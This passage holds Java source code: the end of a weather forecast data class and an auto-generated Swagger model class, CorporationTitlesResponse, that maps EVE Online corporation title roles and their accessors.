mForecastTempHighC = turnFtoC(forecastTempHighF);
}
public int getForecastTempLowF() {
return mForecastTempLowF;
}
protected void setForecastTempLowF(int forecastTempLowF) {
mForecastTempLowF = forecastTempLowF;
mForecastTempLowC = turnFtoC(forecastTempLowF);
}
public String getForecastConditionIconURL() {
return mForecastConditionIconURL;
}
public String getForecastText() {
return mForecastText;
}
protected void setForecastText(String forecastText) {
mForecastText = forecastText;
}
}
}
|
|
/*
* EVE Swagger Interface
* An OpenAPI for EVE Online
*
*
*
* NOTE: This class is auto generated by the swagger code generator program.
* https://github.com/swagger-api/swagger-codegen.git
* Do not edit the class manually.
*/
package net.troja.eve.esi.model;
import java.util.Objects;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.annotation.JsonCreator;
import io.swagger.annotations.ApiModel;
import io.swagger.annotations.ApiModelProperty;
import java.util.ArrayList;
import java.util.List;
import java.io.Serializable;
/**
* 200 ok object
*/
@ApiModel(description = "200 ok object")
public class CorporationTitlesResponse implements Serializable {
private static final long serialVersionUID = 1L;
/**
 * grantable_roles string
*/
public enum GrantableRolesEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
GrantableRolesEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static GrantableRolesEnum fromValue(String text) {
for (GrantableRolesEnum b : GrantableRolesEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("grantable_roles")
private List<GrantableRolesEnum> grantableRoles = new ArrayList<GrantableRolesEnum>();
/**
* grantable_roles_at_base string
*/
public enum GrantableRolesAtBaseEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
GrantableRolesAtBaseEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static GrantableRolesAtBaseEnum fromValue(String text) {
for (GrantableRolesAtBaseEnum b : GrantableRolesAtBaseEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("grantable_roles_at_base")
private List<GrantableRolesAtBaseEnum> grantableRolesAtBase = new ArrayList<GrantableRolesAtBaseEnum>();
/**
* grantable_roles_at_hq string
*/
public enum GrantableRolesAtHqEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
GrantableRolesAtHqEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static GrantableRolesAtHqEnum fromValue(String text) {
for (GrantableRolesAtHqEnum b : GrantableRolesAtHqEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("grantable_roles_at_hq")
private List<GrantableRolesAtHqEnum> grantableRolesAtHq = new ArrayList<GrantableRolesAtHqEnum>();
/**
* grantable_roles_at_other string
*/
public enum GrantableRolesAtOtherEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
GrantableRolesAtOtherEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static GrantableRolesAtOtherEnum fromValue(String text) {
for (GrantableRolesAtOtherEnum b : GrantableRolesAtOtherEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("grantable_roles_at_other")
private List<GrantableRolesAtOtherEnum> grantableRolesAtOther = new ArrayList<GrantableRolesAtOtherEnum>();
@JsonProperty("name")
private String name = null;
/**
* role string
*/
public enum RolesEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
RolesEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static RolesEnum fromValue(String text) {
for (RolesEnum b : RolesEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("roles")
private List<RolesEnum> roles = new ArrayList<RolesEnum>();
/**
* roles_at_base string
*/
public enum RolesAtBaseEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
RolesAtBaseEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static RolesAtBaseEnum fromValue(String text) {
for (RolesAtBaseEnum b : RolesAtBaseEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("roles_at_base")
private List<RolesAtBaseEnum> rolesAtBase = new ArrayList<RolesAtBaseEnum>();
/**
* roles_at_hq string
*/
public enum RolesAtHqEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
RolesAtHqEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static RolesAtHqEnum fromValue(String text) {
for (RolesAtHqEnum b : RolesAtHqEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("roles_at_hq")
private List<RolesAtHqEnum> rolesAtHq = new ArrayList<RolesAtHqEnum>();
/**
* roles_at_other string
*/
public enum RolesAtOtherEnum {
ACCOUNT_TAKE_1("Account_Take_1"),
ACCOUNT_TAKE_2("Account_Take_2"),
ACCOUNT_TAKE_3("Account_Take_3"),
ACCOUNT_TAKE_4("Account_Take_4"),
ACCOUNT_TAKE_5("Account_Take_5"),
ACCOUNT_TAKE_6("Account_Take_6"),
ACCOUNT_TAKE_7("Account_Take_7"),
ACCOUNTANT("Accountant"),
AUDITOR("Auditor"),
COMMUNICATIONS_OFFICER("Communications_Officer"),
CONFIG_EQUIPMENT("Config_Equipment"),
CONFIG_STARBASE_EQUIPMENT("Config_Starbase_Equipment"),
CONTAINER_TAKE_1("Container_Take_1"),
CONTAINER_TAKE_2("Container_Take_2"),
CONTAINER_TAKE_3("Container_Take_3"),
CONTAINER_TAKE_4("Container_Take_4"),
CONTAINER_TAKE_5("Container_Take_5"),
CONTAINER_TAKE_6("Container_Take_6"),
CONTAINER_TAKE_7("Container_Take_7"),
CONTRACT_MANAGER("Contract_Manager"),
DIPLOMAT("Diplomat"),
DIRECTOR("Director"),
FACTORY_MANAGER("Factory_Manager"),
FITTING_MANAGER("Fitting_Manager"),
HANGAR_QUERY_1("Hangar_Query_1"),
HANGAR_QUERY_2("Hangar_Query_2"),
HANGAR_QUERY_3("Hangar_Query_3"),
HANGAR_QUERY_4("Hangar_Query_4"),
HANGAR_QUERY_5("Hangar_Query_5"),
HANGAR_QUERY_6("Hangar_Query_6"),
HANGAR_QUERY_7("Hangar_Query_7"),
HANGAR_TAKE_1("Hangar_Take_1"),
HANGAR_TAKE_2("Hangar_Take_2"),
HANGAR_TAKE_3("Hangar_Take_3"),
HANGAR_TAKE_4("Hangar_Take_4"),
HANGAR_TAKE_5("Hangar_Take_5"),
HANGAR_TAKE_6("Hangar_Take_6"),
HANGAR_TAKE_7("Hangar_Take_7"),
JUNIOR_ACCOUNTANT("Junior_Accountant"),
PERSONNEL_MANAGER("Personnel_Manager"),
RENT_FACTORY_FACILITY("Rent_Factory_Facility"),
RENT_OFFICE("Rent_Office"),
RENT_RESEARCH_FACILITY("Rent_Research_Facility"),
SECURITY_OFFICER("Security_Officer"),
STARBASE_DEFENSE_OPERATOR("Starbase_Defense_Operator"),
STARBASE_FUEL_TECHNICIAN("Starbase_Fuel_Technician"),
STATION_MANAGER("Station_Manager"),
TERRESTRIAL_COMBAT_OFFICER("Terrestrial_Combat_Officer"),
TERRESTRIAL_LOGISTICS_OFFICER("Terrestrial_Logistics_Officer"),
TRADER("Trader");
private String value;
RolesAtOtherEnum(String value) {
this.value = value;
}
@Override
public String toString() {
return String.valueOf(value);
}
@JsonCreator
public static RolesAtOtherEnum fromValue(String text) {
for (RolesAtOtherEnum b : RolesAtOtherEnum.values()) {
if (String.valueOf(b.value).equals(text)) {
return b;
}
}
return null;
}
}
@JsonProperty("roles_at_other")
private List<RolesAtOtherEnum> rolesAtOther = new ArrayList<RolesAtOtherEnum>();
@JsonProperty("title_id")
private Integer titleId = null;
public CorporationTitlesResponse grantableRoles(List<GrantableRolesEnum> grantableRoles) {
this.grantableRoles = grantableRoles;
return this;
}
public CorporationTitlesResponse addGrantableRolesItem(GrantableRolesEnum grantableRolesItem) {
this.grantableRoles.add(grantableRolesItem);
return this;
}
/**
* grantable_roles array
*
* @return grantableRoles
**/
@ApiModelProperty(example = "null", value = "grantable_roles array")
public List<GrantableRolesEnum> getGrantableRoles() {
return grantableRoles;
}
public void setGrantableRoles(List<GrantableRolesEnum> grantableRoles) {
this.grantableRoles = grantableRoles;
}
public CorporationTitlesResponse grantableRolesAtBase(List<GrantableRolesAtBaseEnum> grantableRolesAtBase) {
this.grantableRolesAtBase = grantableRolesAtBase;
return this;
}
public CorporationTitlesResponse addGrantableRolesAtBaseItem(GrantableRolesAtBaseEnum grantableRolesAtBaseItem) {
this.grantableRolesAtBase.add(grantableRolesAtBaseItem);
return this;
}
/**
* grantable_roles_at_base array
*
* @return grantableRolesAtBase
**/
@ApiModelProperty(example = "null", value = "grantable_roles_at_base array")
public List<GrantableRolesAtBaseEnum> getGrantableRolesAtBase() {
return grantableRolesAtBase;
}
public void setGrantableRolesAtBase(List<GrantableRolesAtBaseEnum> grantableRolesAtBase) {
this.grantableRolesAtBase = grantableRolesAtBase;
}
public CorporationTitlesResponse grantableRolesAtHq(List<GrantableRolesAtHqEnum> grantableRolesAtHq) {
this.grantableRolesAtHq = grantableRolesAtHq;
return this;
}
public CorporationTitlesResponse addGrantableRolesAtHqItem(GrantableRolesAtHqEnum grantableRolesAtHqItem) {
this.grantableRolesAtHq.add(grantableRolesAtHqItem);
return this;
}
/**
* grantable_roles_at_hq array
*
* @return grantableRolesAtHq
**/
@ApiModelProperty(example = "null", value = "grantable_roles_at_hq array")
public List<GrantableRolesAtHqEnum> getGrantableRolesAtHq() {
return grantableRolesAtHq;
}
public void setGrantableRolesAtHq(List<GrantableRolesAtHqEnum> grantableRolesAtHq) {
this.grantableRolesAtHq = grantableRolesAtHq;
}
public CorporationTitlesResponse grantableRolesAtOther(List<GrantableRolesAtOtherEnum> grantableRolesAtOther) {
this.grantableRolesAtOther = grantableRolesAtOther;
return this;
}
public CorporationTitlesResponse addGrantableRolesAtOtherItem(GrantableRolesAtOtherEnum grantableRolesAtOtherItem) {
this.grantableRolesAtOther.add(grantableRolesAtOtherItem);
return this;
}
/**
* grantable_roles_at_other array
*
* @return grantableRolesAtOther
**/
@ApiModelProperty(example = "null", value = "grantable_roles_at_other array")
public List<GrantableRolesAtOtherEnum> getGrantableRolesAtOther() {
return grantableRolesAtOther;
}
public void setGrantableRolesAtOther(List<GrantableRolesAtOtherEnum> grantableRolesAtOther) {
this.grantableRolesAtOther = grantableRolesAtOther;
}
public CorporationTitlesResponse name(String name) {
this.name = name;
return this;
}
/**
* name string
*
* @return name
**/
@ApiModelProperty(example = "null", value = "name string")
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public CorporationTitlesResponse roles(List<RolesEnum> roles) {
this.roles = roles;
return this;
}
public CorporationTitlesResponse addRolesItem(RolesEnum rolesItem) {
this.roles.add(rolesItem);
return this;
}
/**
* roles array
*
* @return roles
**/
@ApiModelProperty(example = "null", value = "roles array")
public List<RolesEnum> getRoles() {
return roles;
}
public void setRoles(List<RolesEnum> roles) {
this.roles = roles;
}
public CorporationTitlesResponse rolesAtBase(List<RolesAtBaseEnum> rolesAtBase) {
this.rolesAtBase = rolesAtBase;
return this;
}
public CorporationTitlesResponse addRolesAtBaseItem(RolesAtBaseEnum rolesAtBaseItem) {
this.rolesAtBase.add(rolesAtBaseItem);
return this;
}
/**
* roles_at_base array
*
* @return rolesAtBase
**/
@ApiModelProperty(example = "null", value = "roles_at_base array")
public List<RolesAtBaseEnum> getRolesAtBase() {
return rolesAtBase;
}
public void setRolesAtBase(List<RolesAtBaseEnum> rolesAtBase) {
this.rolesAtBase = rolesAtBase;
}
public CorporationTitlesResponse rolesAtHq(List<RolesAtHqEnum> rolesAtHq) {
this.rolesAtHq = rolesAtHq;
return this;
}
public CorporationTitlesResponse addRolesAtHqItem(RolesAtHqEnum rolesAtHqItem) {
this.rolesAtHq.add(rolesAtHqItem);
return this;
}
/**
* roles_at_hq array
*
* @return rolesAtHq
**/
@ApiModelProperty(example = "null", value = "roles_at_hq array")
public List<RolesAtHqEnum> getRolesAtHq() {
return rolesAtHq;
}
public void setRolesAtHq(List<RolesAtHqEnum> rolesAtHq) {
this.rolesAtHq = rolesAtHq;
}
public CorporationTitlesResponse rolesAtOther(List<RolesAtOtherEnum> rolesAtOther) {
this.rolesAtOther = rolesAtOther;
return this;
}
public CorporationTitlesResponse addRolesAtOtherItem(RolesAtOtherEnum rolesAtOtherItem) {
this.rolesAtOther.add(rolesAtOtherItem);
return this;
}
/**
* roles_at_other array
*
* @return rolesAtOther
**/
